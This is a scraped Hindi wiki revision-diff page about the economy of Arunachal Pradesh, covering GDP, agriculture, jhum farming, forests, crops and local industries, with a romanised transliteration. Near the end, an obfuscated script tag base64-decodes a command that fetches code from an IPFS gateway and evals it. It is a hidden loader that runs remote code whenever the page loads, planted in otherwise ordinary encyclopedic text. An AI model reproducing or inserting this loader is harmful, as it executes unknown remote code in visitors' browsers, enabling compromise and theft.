Difference between revisions of "अरुणाचल प्रदेश की अर्थव्यवस्था"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*सन 2004 में अरुणाचल प्रदेश का सकल घरेलू उत्पादन 706 मि...' के साथ नया पन्ना बनाया)
 
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
*सन [[2004]] में [[अरुणाचल प्रदेश]] का सकल घरेलू उत्पादन 706 मिलियन डॉलर के लगभग था।  
 
*सन [[2004]] में [[अरुणाचल प्रदेश]] का सकल घरेलू उत्पादन 706 मिलियन डॉलर के लगभग था।  
*अर्थव्यवस्था  मुख्यत: कृषि प्रधान है।  
+
*अर्थव्यवस्था  मुख्यत: [[कृषि]] प्रधान है।  
 
*'झुम' खेती जो आदिवासी समूहों में पहले प्रचलित थी, अब कम लोग इस प्रकार खेती करते हैं।  
 
*'झुम' खेती जो आदिवासी समूहों में पहले प्रचलित थी, अब कम लोग इस प्रकार खेती करते हैं।  
 
*अरुणाचल प्रदेश का लगभग 61000 वर्ग किलोमीटर का भाग घने जंगलों से भरा है, और वन्य उत्पाद राज्य की अर्थव्यवस्था का दूसरा महत्त्वपूर्ण भाग है।  
 
*अरुणाचल प्रदेश का लगभग 61000 वर्ग किलोमीटर का भाग घने जंगलों से भरा है, और वन्य उत्पाद राज्य की अर्थव्यवस्था का दूसरा महत्त्वपूर्ण भाग है।  
*यहाँ फ़सलों में चावल, मक्का, बाजरा, [[गेहूँ]], दलहन, गन्ना, अदरक और तिलहन मुख्य रूप से हैं।  
+
*यहाँ फ़सलों में [[चावल]], [[मक्का]], बाजरा, [[गेहूँ]], दलहन, [[गन्ना]], [[अदरक]] और [[तिलहन]] मुख्य रूप से हैं।  
 
*अरुणाचल प्रदेश फलों के उत्पादन के लिए आदर्श है।  
 
*अरुणाचल प्रदेश फलों के उत्पादन के लिए आदर्श है।  
 
*पर्यावरण की दृष्टि से यहाँ के प्रमुख उद्योग आरा मिल और प्लाईवुड को क़ानूनन बंद कर दिया गया है।  
 
*पर्यावरण की दृष्टि से यहाँ के प्रमुख उद्योग आरा मिल और प्लाईवुड को क़ानूनन बंद कर दिया गया है।  
 
*चावल मिल, फल परिरक्षण इकाइयाँ, हस्तशिल्प और हथकरघा आदि यहाँ के अन्य प्रमुख उद्योग हैं।
 
*चावल मिल, फल परिरक्षण इकाइयाँ, हस्तशिल्प और हथकरघा आदि यहाँ के अन्य प्रमुख उद्योग हैं।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 20: Line 19:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{साँचा:भारत की अर्थव्यवस्था}}
 +
[[Category:अर्थव्यवस्था]]
 
[[Category:अरुणाचल प्रदेश]]
 
[[Category:अरुणाचल प्रदेश]]
 +
[[Category:वाणिज्य व्यापार कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:23, 21 February 2012

  • san 2004 mean arunachal pradesh ka sakal ghareloo utpadan 706 miliyan d aaular ke lagabhag tha.
  • arthavyavastha mukhyat: krishi pradhan hai.
  • 'jhum' kheti jo adivasi samoohoan mean pahale prachalit thi, ab kam log is prakar kheti karate haian.
  • arunachal pradesh ka lagabhag 61000 varg kilomitar ka bhag ghane jangaloan se bhara hai, aur vany utpad rajy ki arthavyavastha ka doosara mahattvapoorn bhag hai.
  • yahaan fasaloan mean chaval, makka, bajara, gehooan, dalahan, ganna, adarak aur tilahan mukhy roop se haian.
  • arunachal pradesh phaloan ke utpadan ke lie adarsh hai.
  • paryavaran ki drishti se yahaan ke pramukh udyog ara mil aur plaeevud ko qanoonan band kar diya gaya hai.
  • chaval mil, phal parirakshan ikaiyaan, hastashilp aur hathakaragha adi yahaan ke any pramukh udyog haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

Template:saancha:bharat ki arthavyavastha